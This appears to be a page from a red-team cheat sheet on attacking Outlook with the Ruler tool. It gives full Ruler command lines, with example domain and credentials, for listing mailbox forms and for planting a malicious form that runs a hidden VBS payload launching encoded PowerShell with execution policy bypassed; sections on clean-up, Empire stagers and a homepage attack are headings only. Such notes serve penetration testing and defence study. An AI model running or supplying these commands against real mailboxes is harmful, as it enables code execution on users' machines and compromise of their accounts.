TwitterGitHubBlog

Outlook

Ruler

Rules

Forms

Display forms:

$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug form display

Exploit:

$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug form add --suffix test-form --input vbs-payload.txt --send

vbs-payload.txt:

CreateObject("WScript.Shell").Run "powershell -exec bypass -enc <BASE64_CMD>", 0, false

Clean up:

Empire stager encryption:

Homepage

Exploit:

homepage.html:

Clean up:

Stager encryption is the same as for Ruler/Forms.

Last updated